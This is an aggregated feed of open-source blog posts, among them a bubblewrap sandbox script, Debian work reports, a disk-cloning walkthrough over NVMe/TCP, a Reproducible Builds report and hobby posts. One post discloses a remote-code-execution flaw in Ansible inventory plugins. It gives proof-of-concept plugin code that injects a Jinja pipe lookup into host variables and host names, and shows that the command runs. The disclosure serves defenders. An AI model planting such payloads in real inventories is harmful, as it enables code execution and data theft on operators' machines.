The user experience I thus want is a quick way to enter a “development environment” where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual /home directory.

I initially followed the blog post “Application Isolation using NixOS Containers” by Marcin Sucharski and got something working that mostly did what I wanted, but then a colleague pointed out that tools like firejail can achieve roughly the same with a less “global” setup. I tried to use firejail, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool https://github.com/containers/bubblewrap.

Selective bubblewrapping

This script, called dev and included below, builds a new filesystem namespace with minimal /proc and /dev directories, it’s own /tmp directories. It then binds-mound some directories to make the host’s NixOS system available inside the container (/bin, /usr, the nix store including domain socket, stuff for OpenGL applications). My user’s home directory is taken from ~/.dev-home and some configuration files are bind-mounted for convenient sharing. I intentionally don’t share most of the configuration – for example, a direnv enable in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding .Xauthority file is made available. And finally, if I run dev in a project directory, this project directory is bind mounted writable, and the current working directory is preserved.

The effect is that I can type dev on the command line to enter “dev mode” rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a git push I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.

Clearly, isn’t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in $HOME.

Rough corners

There is more polishing that could be done.

  • In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a xdg-desktop-portal user service, a filtering dbus proxy, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get xdg-desktop-portal to heed my default browser settings…). For now I will live with manually copying and pasting URLs, we’ll see how long this lasts.

  • With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: There is simply no point in running evolution or firefox inside the container, and if I do not even have VSCode or cabal available outside, so that it’s less likely that I forget to enter dev before using these tools.

    It shouldn’t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to bubblewrap here.

So likely I will refine this some more over time. Or get tired of typing dev and going back to what I did before…

The script The dev script (at the time of writing) #!/usr/bin/env bash extra=() if [[ "$PWD" == /home/jojo/build/* ]] || [[ "$PWD" == /home/jojo/projekte/programming/* ]] then extra+=(--bind "$PWD" "$PWD" --chdir "$PWD") fi if [ -n "$1" ] then cmd=( "$@" ) else cmd=( bash ) fi # Caveats: # * access to all of `/etc` # * access to `/nix/var/nix/daemon-socket/socket`, and is trusted user (but needed to run nix) # * access to X11 exec bwrap \ --unshare-all \ \ `# blank slate` \ --share-net \ --proc /proc \ --dev /dev \ --tmpfs /tmp \ --tmpfs /run/user/1000 \ \ `# Needed for GLX applications, in paticular alacritty` \ --dev-bind /dev/dri /dev/dri \ --ro-bind /sys/dev/char /sys/dev/char \ --ro-bind /sys/devices/pci0000:00 /sys/devices/pci0000:00 \ --ro-bind /run/opengl-driver /run/opengl-driver \ \ --ro-bind /bin /bin \ --ro-bind /usr /usr \ --ro-bind /run/current-system /run/current-system \ --ro-bind /nix /nix \ --ro-bind /etc /etc \ --ro-bind /run/systemd/resolve/stub-resolv.conf /run/systemd/resolve/stub-resolv.conf \ \ --bind ~/.dev-home /home/jojo \ --ro-bind ~/.config/alacritty ~/.config/alacritty \ --ro-bind ~/.config/nvim ~/.config/nvim \ --ro-bind ~/.local/share/nvim ~/.local/share/nvim \ --ro-bind ~/.bin ~/.bin \ \ --bind /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 \ --bind ~/.Xauthority ~/.Xauthority \ --setenv DISPLAY :0 \ \ --setenv container dev \ "${extra[@]}" \ -- \ "${cmd[@]}"
Categories: FLOSS Project Planets

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

Mon, 2024-03-11 16:00

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR

Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell.

Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin from ansible.plugins.inventory import BaseInventoryPlugin class InventoryModule(BaseInventoryPlugin): NAME = 'evgeni.inventoryrce.inventory' def verify_file(self, path): valid = False if super(InventoryModule, self).verify_file(path): if path.endswith('evgeni.yml'): valid = True return valid def parse(self, inventory, loader, path, cache=True): super(InventoryModule, self).parse(inventory, loader, path, cache) self.inventory.add_host('exploit.example.com') self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local') self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')

The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar.

The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).

And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list { "_meta": { "hostvars": { "exploit.example.com": { "ansible_connection": "local", "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}" } } }, "all": { "children": [ "ungrouped" ] }, "ungrouped": { "hosts": [ "exploit.example.com" ] } }

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.

Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!

- hosts: all tasks: - name: Display all variables/facts known for a host ansible.builtin.debug: var: hostvars[inventory_hostname]

This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml PLAY [all] ************************************************************************************************ TASK [Gathering Facts] ************************************************************************************ ok: [exploit.example.com] TASK [Display all variables/facts known for a host] ******************************************************* ok: [exploit.example.com] => { "hostvars[inventory_hostname]": { "ansible_all_ipv4_addresses": [ "192.168.122.1" ], … "something_funny": "" } } PLAY RECAP ************************************************************************************************* exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0

We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }} and touch does not return anything. But it did create the file!

% ls -alh /tmp/hacked -rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.

In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

from ansible.utils.unsafe_proxy import wrap_var … self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))

Which then gets rendered as a string when dumping the variables using debug:

"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"

But it seems inventories don't do this:

for k, v in host_vars.items(): self.inventory.set_variable(name, k, v)

(aws_ec2.py)

for key, value in hostvars.items(): self.inventory.set_variable(hostname, key, value)

(hcloud.py)

for k, v in hostvars.items(): try: self.inventory.set_variable(host_name, k, v) except ValueError as e: self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

(foreman.py)

And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481

But even if we only look at inventories, add_host(host) can be abused in a similar way:

from ansible.plugins.inventory import BaseInventoryPlugin class InventoryModule(BaseInventoryPlugin): NAME = 'evgeni.inventoryrce.inventory' def verify_file(self, path): valid = False if super(InventoryModule, self).verify_file(path): if path.endswith('evgeni.yml'): valid = True return valid def parse(self, inventory, loader, path, cache=True): super(InventoryModule, self).parse(inventory, loader, path, cache) self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}') % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml PLAY [all] ************************************************************************************************ TASK [Gathering Facts] ************************************************************************************ fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true} PLAY RECAP ************************************************************************************************ lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0 % ls -alh /tmp/hacked-host -rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

Categories: FLOSS Project Planets

Thorsten Alteholz: My Debian Activities in February 2024

Sun, 2024-03-10 08:22
FTP master

This month I accepted 242 and rejected 42 packages. The overall number of packages that got accepted was 251.

This was just a short month and the weather outside was not really motivating. I hope it will be better in March.

Debian LTS

This was my hundred-sixteenth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.

During my allocated time I uploaded:

  • [DLA 3739-1] libjwt security update for one CVE to fix some ‘constant-time-for-execution-issue
  • [libjwt] upload to unstable
  • [#1064550] Bullseye PU bug for libjwt
  • [#1064551] Bookworm PU bug for libjwt
  • [#1064551] Bookworm PU bug for libjwt; upload after approval
  • [DLA 3741-1] engrampa security update for one CVE to fix a path traversal issue with CPIO archives
  • [#1060186] Bookworm PU-bug for libde265 was flagged for acceptance
  • [#1056935] Bullseye PU-bug for libde265 was flagged for acceptance

I also started to work on qtbase-opensource-src (an update is needed for ELTS, so an LTS update seems to be appropriate as well, especially as there are postponed CVE).

Debian ELTS

This month was the sixty-seventth ELTS month. During my allocated time I uploaded:

  • [ELA-1047-1]bind9 security update for one CVE to fix an stack exhaustion issue in Jessie and Stretch

The upload of bind9 was a bit exciting, but all occuring issues with the new upload workflow could be quickly fixed by Helmut and the packages finally reached their destination. I wonder why it is always me who stumbles upon special cases? This month I also worked on the Jessie and Stretch updates for exim4. I also started to work on an update for qtbase-opensource-src in Stretch (and LTS and other releases as well).

Debian Printing

This month I uploaded new upstream versions of:

This work is generously funded by Freexian!

Debian Matomo

I started a new team debian-matomo-maintainers. Within this team all matomo related packages should be handled. PHP PEAR or PECL packages shall be still maintained in their corresponding teams.

This month I uploaded:

This work is generously funded by Freexian!

Debian Astro

This month I uploaded a new upstream version of:

Debian IoT

This month I uploaded new upstream versions of:

Categories: FLOSS Project Planets

Vasudev Kamath: Cloning a laptop over NVME TCP

Sun, 2024-03-10 07:45

Recently, I got a new laptop and had to set it up so I could start using it. But I wasn't really in the mood to go through the same old steps which I had explained in this post earlier. I was complaining about this to my colleague, and there came the suggestion of why not copy the entire disk to the new laptop. Though it sounded like an interesting idea to me, I had my doubts, so here is what I told him in return.

  1. I don't have the tools to open my old laptop and connect the new disk over USB to my new laptop.
  2. I use full disk encryption, and my old laptop has a 512GB disk, whereas the new laptop has a 1TB NVME, and I'm not so familiar with resizing LUKS.

He promptly suggested both could be done. For step 1, just expose the disk using NVME over TCP and connect it over the network and do a full disk copy, and the rest is pretty simple to achieve. In short, he suggested the following:

  1. Export the disk using nvmet-tcp from the old laptop.
  2. Do a disk copy to the new laptop.
  3. Resize the partition to use the full 1TB.
  4. Resize LUKS.
  5. Finally, resize the BTRFS root disk.
Exporting Disk over NVME TCP

The easiest way suggested by my colleague to do this is using systemd-storagetm.service. This service can be invoked by simply booting into storage-target-mode.target by specifying rd.systemd.unit=storage-target-mode.target. But he suggested not to use this as I need to tweak the dracut initrd image to involve network services as well as configuring WiFi from this mode is a painful thing to do.

So alternatively, I simply booted both my laptops with GRML rescue CD. And the following step was done to export the NVME disk on my current laptop using the nvmet-tcp module of Linux:

modprobe nvemt-tcp cd /sys/kernel/config/nvmet mkdir ports/0 cd ports/0 echo "ipv4" > addr_adrfam echo 0.0.0.0 > addr_traaddr echo 4420 > addr_trsvcid echo tcp > addr_trtype cd /sys/kernel/config/nvmet/subsystems mkdir testnqn echo 1 >testnqn/allow_any_host mkdir testnqn/namespaces/1 cd testnqn # replace the device name with the disk you want to export echo "/dev/nvme0n1" > namespaces/1/device_path echo 1 > namespaces/1/enable ln -s "../../subsystems/testnqn" /sys/kernel/config/nvmet/ports/0/subsystems/testnqn

These steps ensure that the device is now exported using NVME over TCP. The next step is to detect this on the new laptop and connect the device:

nvme discover -t tcp -a <ip> -s 4420 nvme connectl-all -t tcp -a <> -s 4420

Finally, nvme list shows the device which is connected to the new laptop, and we can proceed with the next step, which is to do the disk copy.

Copying the Disk

I simply used the dd command to copy the root disk to my new laptop. Since the new laptop didn't have an Ethernet port, I had to rely only on WiFi, and it took about 7 and a half hours to copy the entire 512GB to the new laptop. The speed at which I was copying was about 18-20MB/s. The other option would have been to create an initial partition and file system and do an rsync of the root disk or use BTRFS itself for file system transfer.

dd if=/dev/nvme2n1 of=/dev/nvme0n1 status=progress bs=40M Resizing Partition and LUKS Container

The final part was very easy. When I launched parted, it detected that the partition table does not match the disk size and asked if it can fix it, and I said yes. Next, I had to install cloud-guest-utils to get growpart to fix the second partition, and the following command extended the partition to the full 1TB:

growpart /dev/nvem0n1 p2

Next, I used cryptsetup-resize to increase the LUKS container size.

cryptsetup luksOpen /dev/nvme0n1p2 ENC cryptsetup resize ENC

Finally, I rebooted into the disk, and everything worked fine. After logging into the system, I resized the BTRFS file system. BTRFS requires the system to be mounted for resize, so I could not attempt it in live boot.

btfs fielsystem resize max / Conclussion

The only benefit of this entire process is that I have a new laptop, but I still feel like I'm using my existing laptop. Typically, setting up a new laptop takes about a week or two to completely get adjusted, but in this case, that entire time is saved.

An added benefit is that I learned how to export disks using NVME over TCP, thanks to my colleague. This new knowledge adds to the value of the experience.

Categories: FLOSS Project Planets

Valhalla's Things: Low Fat, No Eggs, Lasagna-ish

Sat, 2024-03-09 19:00
Posted on March 10, 2024
Tags: madeof:atoms, craft:cooking

A few notes on what we had for lunch, to be able to repeat it after the summer.

There were a number of food intolerance related restrictions which meant that the traditional lasagna recipe wasn’t an option; the result still tasted good, but it was a bit softer and messier to take out of the pan and into the dishes.

On Saturday afternoon we made fresh no-egg pasta with 200 g (durum) flour and 100 g water, after about 1 hour it was divided in 6 parts and rolled to thickness #6 on the pasta machine.

Meanwhile, about 500 ml of low fat almost-ragù-like meat sauce was taken out of the freezer: this was a bit too little, 750 ml would have been better.

On Saturday evening we made a sauce with 1 l of low-fat milk and 80 g of flour, and the meat sauce was heated up.

Then everything was put in a 28 cm × 23 cm pan, with 6 layers of pasta and 7 layers of the two sauces, and left to cool down.

And on Sunday morning it was baked for 35 min in the oven at 180 °C.

With 3 people we only had about two thirds of it.

Next time I think we should try to use 400 - 500 g of flour (so that it’s easier to work by machine), 2 l of milk, 1.5 l of meat sauce and divide it into 3 pans: one to eat the next day and two to freeze (uncooked) for another day.

No pictures, because by the time I thought about writing a post we were already more than halfway through eating it :)

Categories: FLOSS Project Planets

Reproducible Builds: Reproducible Builds in February 2024

Sat, 2024-03-09 11:53

Welcome to the February 2024 report from the Reproducible Builds project! In our reports, we try to outline what we have been up to over the past month as well as mentioning some of the important things happening in software supply-chain security.

Reproducible Builds at FOSDEM 2024

Core Reproducible Builds developer Holger Levsen presented at the main track at FOSDEM on Saturday 3rd February this year in Brussels, Belgium. However, that wasn’t the only talk related to Reproducible Builds.

However, please see our comprehensive FOSDEM 2024 news post for the full details and links.


Maintainer Perspectives on Open Source Software Security

Bernhard M. Wiedemann spotted that a recent report entitled Maintainer Perspectives on Open Source Software Security written by Stephen Hendrick and Ashwin Ramaswami of the Linux Foundation sports an infographic which mentions that “56% of [polled] projects support reproducible builds”.


Three new reproducibility-related academic papers

A total of three separate scholarly papers related to Reproducible Builds have appeared this month:

Signing in Four Public Software Package Registries: Quantity, Quality, and Influencing Factors by Taylor R. Schorlemmer, Kelechi G. Kalu, Luke Chigges, Kyung Myung Ko, Eman Abdul-Muhd, Abu Ishgair, Saurabh Bagchi, Santiago Torres-Arias and James C. Davis (Purdue University, Indiana, USA) is concerned with the problem that:

Package maintainers can guarantee package authorship through software signing [but] it is unclear how common this practice is, and whether the resulting signatures are created properly. Prior work has provided raw data on signing practices, but measured single platforms, did not consider time, and did not provide insight on factors that may influence signing. We lack a comprehensive, multi-platform understanding of signing adoption and relevant factors. This study addresses this gap. (arXiv, full PDF)


Reproducibility of Build Environments through Space and Time by Julien Malka, Stefano Zacchiroli and Théo Zimmermann (Institut Polytechnique de Paris, France) addresses:

[The] principle of reusability […] makes it harder to reproduce projects’ build environments, even though reproducibility of build environments is essential for collaboration, maintenance and component lifetime. In this work, we argue that functional package managers provide the tooling to make build environments reproducible in space and time, and we produce a preliminary evaluation to justify this claim.

The abstract continues with the claim that “Using historical data, we show that we are able to reproduce build environments of about 7 million Nix packages, and to rebuild 99.94% of the 14 thousand packages from a 6-year-old Nixpkgs revision. (arXiv, full PDF)


Options Matter: Documenting and Fixing Non-Reproducible Builds in Highly-Configurable Systems by Georges Aaron Randrianaina, Djamel Eddine Khelladi, Olivier Zendra and Mathieu Acher (Inria centre at Rennes University, France):

This paper thus proposes an approach to automatically identify configuration options causing non-reproducibility of builds. It begins by building a set of builds in order to detect non-reproducible ones through binary comparison. We then develop automated techniques that combine statistical learning with symbolic reasoning to analyze over 20,000 configuration options. Our methods are designed to both detect options causing non-reproducibility, and remedy non-reproducible configurations, two tasks that are challenging and costly to perform manually. (HAL Portal, full PDF)


Mailing list highlights

From our mailing list this month:


Distribution work

In Debian this month, 5 reviews of Debian packages were added, 22 were updated and 8 were removed this month adding to Debian’s knowledge about identified issues. A number of issue types were updated as well. […][…][…][…] In addition, Roland Clobus posted his 23rd update of the status of reproducible ISO images on our mailing list. In particular, Roland helpfully summarised that “all major desktops build reproducibly with bullseye, bookworm, trixie and sid provided they are built for a second time within the same DAK run (i.e. [within] 6 hours)” and that there will likely be further work at a MiniDebCamp in Hamburg. Furthermore, Roland also responded in-depth to a query about a previous report


Fedora developer Zbigniew Jędrzejewski-Szmek announced a work-in-progress script called fedora-repro-build that attempts to reproduce an existing package within a koji build environment. Although the projects’ README file lists a number of “fields will always or almost always vary” and there is a non-zero list of other known issues, this is an excellent first step towards full Fedora reproducibility.


Jelle van der Waa introduced a new linter rule for Arch Linux packages in order to detect cache files leftover by the Sphinx documentation generator which are unreproducible by nature and should not be packaged. At the time of writing, 7 packages in the Arch repository are affected by this.


Elsewhere, Bernhard M. Wiedemann posted another monthly update for his work elsewhere in openSUSE.


diffoscope

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions 256, 257 and 258 to Debian and made the following additional changes:

  • Use a deterministic name instead of trusting gpg’s –use-embedded-filenames. Many thanks to Daniel Kahn Gillmor dkg@debian.org for reporting this issue and providing feedback. [][]
  • Don’t error-out with a traceback if we encounter struct.unpack-related errors when parsing Python .pyc files. (#1064973). []
  • Don’t try and compare rdb_expected_diff on non-GNU systems as %p formatting can vary, especially with respect to MacOS. []
  • Fix compatibility with pytest 8.0. []
  • Temporarily fix support for Python 3.11.8. []
  • Use the 7zip package (over p7zip-full) after a Debian package transition. (#1063559). []
  • Bump the minimum Black source code reformatter requirement to 24.1.1+. []
  • Expand an older changelog entry with a CVE reference. []
  • Make test_zip black clean. []

In addition, James Addison contributed a patch to parse the headers from the diff(1) correctly [][] — thanks! And lastly, Vagrant Cascadian pushed updates in GNU Guix for diffoscope to version 255, 256, and 258, and updated trydiffoscope to 67.0.6.


reprotest

reprotest is our tool for building the same source code twice in different environments and then checking the binaries produced by each build for any differences. This month, Vagrant Cascadian made a number of changes, including:

  • Create a (working) proof of concept for enabling a specific number of CPUs. [][]
  • Consistently use 398 days for time variation rather than choosing randomly and update README.rst to match. [][]
  • Support a new --vary=build_path.path option. [][][][]


Website updates

There were made a number of improvements to our website this month, including:


Reproducibility testing framework

The Reproducible Builds project operates a comprehensive testing framework (available at tests.reproducible-builds.org) in order to check packages and other artifacts for reproducibility. In February, a number of changes were made by Holger Levsen:

  • Debian-related changes:

    • Temporarily disable upgrading/bootstraping Debian unstable and experimental as they are currently broken. [][]
    • Use the 64-bit amd64 kernel on all i386 nodes; no more 686 PAE kernels. []
    • Add an Erlang package set. []
  • Other changes:

    • Grant Jan-Benedict Glaw shell access to the Jenkins node. []
    • Enable debugging for NetBSD reproducibility testing. []
    • Use /usr/bin/du --apparent-size in the Jenkins shell monitor. []
    • Revert “reproducible nodes: mark osuosl2 as down”. []
    • Thanks again to Codethink, for they have doubled the RAM on our arm64 nodes. []
    • Only set /proc/$pid/oom_score_adj to -1000 if it has not already been done. []
    • Add the opemwrt-target-tegra and jtx task to the list of zombie jobs. [][]

Vagrant Cascadian also made the following changes:

  • Overhaul the handling of OpenSSH configuration files after updating from Debian bookworm. [][][]
  • Add two new armhf architecture build nodes, virt32z and virt64z, and insert them into the Munin monitoring. [][] [][]

In addition, Alexander Couzens updated the OpenWrt configuration in order to replace the tegra target with mpc85xx [], Jan-Benedict Glaw updated the NetBSD build script to use a separate $TMPDIR to mitigate out of space issues on a tmpfs-backed /tmp [] and Zheng Junjie added a link to the GNU Guix tests [].

Lastly, node maintenance was performed by Holger Levsen [][][][][][] and Vagrant Cascadian [][][][].


Upstream patches

The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:


If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

Categories: FLOSS Project Planets

Iustin Pop: Finally learning some Rust - hello photo-backlog-exporter!

Sat, 2024-03-09 08:30

After 4? 5? or so years of wanting to learn Rust, over the past 4 or so months I finally bit the bullet and found the motivation to write some Rust. And the subject.

And I was, and still am, thoroughly surprised. It’s like someone took Haskell, simplified it to some extents, and wrote a systems language out of it. Writing Rust after Haskell seems easy, and pleasant, and you:

  • don’t have to care about unintended laziness which causes memory “leaks” (stuck memory, more like).
  • don’t have to care about GC eating too much of your multi-threaded RTS.
  • can be happy that there’s lots of activity and buzz around the language.
  • can be happy for generating very small, efficient binaries that feel right at home on Raspberry Pi, especially not the 5.
  • are very happy that error handling is done right (Option and Result, not like Go…)

On the other hand:

  • there are no actual monads; the ? operator kind-of-looks-like being in do blocks, but only and only for Option and Result, sadly.
  • there’s no Stackage, it’s like having only Hackage available, and you can hope all packages work together well.
  • most packaging is designed to work only against upstream/online crates.io, so offline packaging is doable but not “native” (from what I’ve seen).

However, overall, one can clearly see there’s more movement in Rust, and the quality of some parts of the toolchain is better (looking at you, rust-analyzer, compared to HLS).

So, with that, I’ve just tagged photo-backlog-exporter v0.1.0. It’s a port of a Python script that was run as a textfile collector, which meant updates every ~15 minutes, since it was a bit slow to start, which I then rewrote in Go (but I don’t like Go the language, plus the GC - if I have to deal with a GC, I’d rather write Haskell), then finally rewrote in Rust.

What does this do? It exports metrics for Prometheus based on the count, age and distribution of files in a directory. These files being, for me, the pictures I still have to sort, cull and process, because I never have enough free time to clear out the backlog. The script is kind of designed to work together with Corydalis, but since it doesn’t care about file content, it can also double (easily) as simple “file count/age exporter”.

And to my surprise, writing in Rust is soo pleasant, that the feature list is greater than the original Python script, and - compared to that untested script - I’ve rather easily achieved a very high coverage ratio. Rust has multiple types of tests, and the combination allows getting pretty down to details on testing:

  • region coverage: >80%
  • function coverage: >89% (so close here!)
  • line coverage: >95%

I had to combine a (large) number of testing crates to get it expressive enough, but it was worth the effort. The last find from yesterday, assert_cmd, is excellent to describe testing/assertion in Rust itself, rather than via a separate, new DSL, like I was using shelltest for, in Haskell.

To some extent, I feel like I found the missing arrow in the quiver. Haskell is good, quite very good for some type of workloads, but of course not all, and Rust complements that very nicely, with lots of overlap (as expected). Python can fill in any quick-and-dirty scripting needed. And I just need to learn more frontend, specifically Typescript (the language, not referring to any specific libraries/frameworks), and I’ll be ready for AI to take over coding 😅…

So, for now, I’ll need to split my free time coding between all of the above, and keep exercising my skills. But so glad to have found a good new language!

Categories: FLOSS Project Planets

Valhalla's Things: Elastic Neck Top Two: MOAR Ruffles

Fri, 2024-03-08 19:00
Posted on March 9, 2024
Tags: madeof:atoms, craft:sewing, FreeSoftWear

After making my Elastic Neck Top I knew I wanted to make another one less constrained by the amount of available fabric.

I had a big cut of white cotton voile, I bought some more swimsuit elastic, and I also had a spool of n°100 sewing cotton, but then I postponed the project for a while I was working on other things.

Then FOSDEM 2024 arrived, I was going to remote it, and I was working on my Augusta Stays, but I knew that in the middle of FOSDEM I risked getting to the stage where I needed to leave the computer to try the stays on: not something really compatible with the frenetic pace of a FOSDEM weekend, even one spent at home.

I needed a backup project1, and this was perfect: I already had everything I needed, the pattern and instructions were already on my site (so I didn’t need to take pictures while working), and it was mostly a lot of straight seams, perfect while watching conference videos.

So, on the Friday before FOSDEM I cut all of the pieces, then spent three quarters of FOSDEM on the stays, and when I reached the point where I needed to stop for a fit test I started on the top.

Like the first one, everything was sewn by hand, and one week after I had started everything was assembled, except for the casings for the elastic at the neck and cuffs, which required about 10 km of sewing, and even if it was just a running stitch it made me want to reconsider my lifestyle choices a few times: there was really no reason for me not to do just those seams by machine in a few minutes.

Instead I kept sewing by hand whenever I had time for it, and on the next weekend it was ready. We had a rare day of sun during the weekend, so I wore my thermal underwear, some other layer, a scarf around my neck, and went outside with my SO to have a batch of pictures taken (those in the jeans posts, and others for a post I haven’t written yet. Have I mentioned I have a backlog?).

And then the top went into the wardrobe, and it will come out again when the weather will be a bit warmer. Or maybe it will be used under the Augusta Stays, since I don’t have a 1700 chemise yet, but that requires actually finishing them.

The pattern for this project was already online, of course, but I’ve added a picture of the casing to the relevant section, and everything is as usual #FreeSoftWear.

  1. yes, I could have worked on some knitting WIP, but lately I’m more in a sewing mood.↩︎

Categories: FLOSS Project Planets

Louis-Philippe Véronneau: Acts of active procrastination: example of a silly Python script for Moodle

Fri, 2024-03-08 18:15

My brain is currently suffering from an overload caused by grading student assignments.

In search of a somewhat productive way to procrastinate, I thought I would share a small script I wrote sometime in 2023 to facilitate my grading work.

I use Moodle for all the classes I teach and students use it to hand me out their papers. When I'm ready to grade them, I download the ZIP archive Moodle provides containing all their PDF files and comment them using xournalpp and my Wacom tablet.

Once this is done, I have a directory structure that looks like this:

Assignment FooBar/ ├── Student A_21100_assignsubmission_file │   ├── graded paper.pdf │   ├── Student A's perfectly named assignment.pdf │   └── Student A's perfectly named assignment.xopp ├── Student B_21094_assignsubmission_file │   ├── graded paper.pdf │   ├── Student B's perfectly named assignment.pdf │   └── Student B's perfectly named assignment.xopp ├── Student C_21093_assignsubmission_file │   ├── graded paper.pdf │   ├── Student C's perfectly named assignment.pdf │   └── Student C's perfectly named assignment.xopp ⋮

Before I can upload files back to Moodle, this directory needs to be copied (I have to keep the original files), cleaned of everything but the graded paper.pdf files and compressed in a ZIP.

You can see how this can quickly get tedious to do by hand. Not being a complete tool, I often resorted to crafting a few spurious shell one-liners each time I had to do this1. Eventually I got tired of ctrl-R-ing my shell history and wrote something reusable.

Behold this script! When I began writing this post, I was certain I had cheaped out on my 2021 New Year's resolution and written it in Shell, but glory!, it seems I used a proper scripting language instead.

